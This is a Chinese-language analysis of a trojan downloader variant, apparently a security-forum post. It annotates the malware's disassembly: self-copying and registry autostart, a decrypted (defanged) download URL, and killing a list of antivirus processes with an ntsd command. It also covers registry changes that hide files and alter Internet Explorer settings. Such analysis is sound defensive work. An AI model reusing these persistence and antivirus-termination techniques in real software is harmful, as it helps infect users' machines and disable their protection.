一、病毒标签:
病毒名称: AV终结者新变种TrojWare.Win32.TrojanDownloader.KillAV
病毒类型: 下载者
文件SHA1: 3ed481ed4280121aea776575a3417a45a2f833b2
危害等级: 3
文件长度: 脱壳前40,703 字节,脱壳后200,656 字节
受影响系统:Microsoft Windows NT 4.0
Microsoft Windows NT 4.0 Terminal Services Edition
Microsoft Windows 2000
Microsoft Windows XP
Microsoft Windows Server 2003
开发工具: Delphi
加壳类型: Upack 0.3.9 beta2s -> Dwing
二、病毒描述:
病毒复制自身到系统system\目录,文件名称jjxzwzjy090121.exe,并释放出jjxzajcj32dl.dll。劫持杀软,jjxzajcj32dl.dll注
入到ie后访问并下载大量病毒木马。
三、行为分析:
1、病毒复制自身到系统system\目录,文件名称jjxzwzjy090121.exe,并释放出jjxzajcj32dl.dll。
Upack:00178CA6 call @System@@LStrAsg$qqrpvpxv ; System::__linkproc__ LStrAsg(void *,void *)
.Upack:00178CAB push offset aJjxzwzjy ; "jjxzwzjy"
.Upack:00178CB0 push dword_17B6E4
.Upack:00178CB6 push offset a_exe ; ".exe"
.Upack:00178CBB mov eax, offset dword_17B674
.Upack:00178CC0 mov edx, 3
.Upack:00178CC5 call @System@@LStrCatN$qqrv ; System::__linkproc__ LStrCatN(void)
.Upack:00178CCA mov eax, offset dword_17B670
.Upack:00178CCF mov ecx, dword_17B674
.Upack:00178CD5 mov edx, dword_17B6D0
.Upack:00178CDB call @System@@LStrCat3$qqrv ; System::__linkproc__ LStrCat3(void)
.Upack:00178CE0 mov eax, offset dword_17B71C
.Upack:00178CE5 mov edx, dword_17B670 ; C:\WINDOWS\system\jjxzwzjy090121.exe
Upack:00178D3B call CopyFileA ; 将自身复制到C:\WINDOWS\system\jjxzwzjy090121.exe
Upack:00178F05 call sub_177E54 ; 修改注册表达到自启动目的
.Upack:00178F53 call modify_reg_ ; 修改注册表键值:dlncjjcdfc
.Upack:00178F53 ; 指向数据:%SystemRoot%\system\jjxzwzjy090102.exe,提权,遍
历进程
Upack:00178A58 mov eax, offset aStartup ; "Startup"
.Upack:00178A5D call @System@@LStrCopy$qqrv ; System::__linkproc__ LStrCopy(void)
.Upack:00178A62 mov ecx, [ebp-28h]
.Upack:00178A65 mov edx, offset aSoftwareMicr_2 ;
Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
.Upack:00178A6A mov eax, 80000001h
.Upack:00178A6F call RegQueryValueExA_1 ; 注册表查询键值
Upack:00178A84 mov eax, offset a32333831303938 ; "323338313039383237363430363835326A777C7"...
.Upack:00178A89 call @Adodb@TCustomADODataSet@ClearCalcFields$qqrpc ;
Adodb::TCustomADODataSet::ClearCalcFields(char *)
.Upack:00178A8E mov edx, [ebp-2Ch]
.Upack:00178A91 mov eax, offset dword_17B720
.Upack:00178A96 call @System@@LStrAsg$qqrpvpxv ; System::__linkproc__ LStrAsg(void *,void *)
.Upack:00178A9B lea edx, [ebp-30h]
.Upack:00178A9E mov eax, dword_17B720
.Upack:00178AA3 call sub_174E44 ; 解密call,解密后为hxxp://www.a3168.com/mydown.asp
.Upack:00178B32 call sub_174A58 ; 提权
.Upack:00178B37 call sub_176E4C ; avp.e
Upack:00178C8C call sub_176960 ; 遍历枚举下列安全进程名,一旦发现尝试使用“ntsd -c q –p pid
”命令关闭该安全进程,实现自身的保护
.Upack:00178C8C ; RUNIEP.exe
.Upack:00178C8C ; KRegEx.exe
.Upack:00178C8C ; KVXP.kxp
.Upack:00178C8C ; 360tray.exe
.Upack:00178C8C ; RSTray.exe
.Upack:00178C8C ; QQDoctor.exe
.Upack:00178C8C ; DrRtp.exe
Upack:00178E3C call WritePrivateProfileStringA_0 ; 写入文件C:\Documents and Settings\All
Users\jjjydf16.ini
.Upack:00178E3C ; 内容为:
.Upack:00178E3C ; [mydown]
.Upack:00178E3C ; old_exe=
.Upack:00178E3C ; old_dll32=
.Upack:00178E3C ; ver=090121
.Upack:00178E3C ; fnexe=C:\WINDOWS\system\jjxzwzjy090121.exe
.Upack:00178E3C ; reg_start=dlmcjjcdfc
.Upack:00178E3C ; fn_dll=C:\WINDOWS\system\jjxzajcj32dl.dll
Upack:001782A8 mov edx, offset aIexp ; "iexp"
.Upack:001782AD call @System@@LStrCat$qqrv ; System::__linkproc__ LStrCat(void)
.Upack:001782B2 mov eax, ebx ; iexplore.exe
.Upack:001782B4 mov edx, offset aLore_exe ; "lore.exe"
.Upack:001782B9 call @System@@LStrCat$qqrv ; System::__linkproc__ LStrCat(void)
.Upack:001782BE push offset aNo ; "no"
.Upack:001782C3 mov ecx, offset aCheck_associat ; "Check_Associations"
.Upack:001782C8 mov edx, offset aSoftwareMicros ; Software\Microsoft\Internet Explorer\Main
.Upack:001782CD mov eax, 80000001h
.Upack:001782D2 call modify_reg_
.Upack:001782D7 push 0 ; hKey
.Upack:001782D9 mov ecx, offset aEnableautodial ; "EnableAutodial"
.Upack:001782DE mov edx, offset aSoftwareMicr_0 ;
Software\Microsoft\Windows\CurrentVersion\Internet Settings
.Upack:001782E3 mov eax, 80000001h
.Upack:001782E8 call RegSetValueExA_0
.Upack:001782ED push 0 ; hKey
.Upack:001782EF mov ecx, offset aNonetautodial ; "NoNetAutodial"
.Upack:001782F4 mov edx, offset aSoftwareMicr_0 ;
Software\Microsoft\Windows\CurrentVersion\Internet Settings
.Upack:001782F9 mov eax, 80000001h
.Upack:001782FE call RegSetValueExA_0
.Upack:00178303 push 0 ; hKey
.Upack:00178305 mov ecx, offset aCheckedvalue ; "CheckedValue"
.Upack:0017830A mov edx, offset aSoftwareMicr_1 ;
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL
.Upack:0017830F mov eax, 80000002h
.Upack:00178314 call RegSetValueExA_0 ; 修改注册表键值
.Upack:00178319 xor eax, eax
[注意]传递专业知识、拓宽行业人脉——看雪讲师团队等你加入!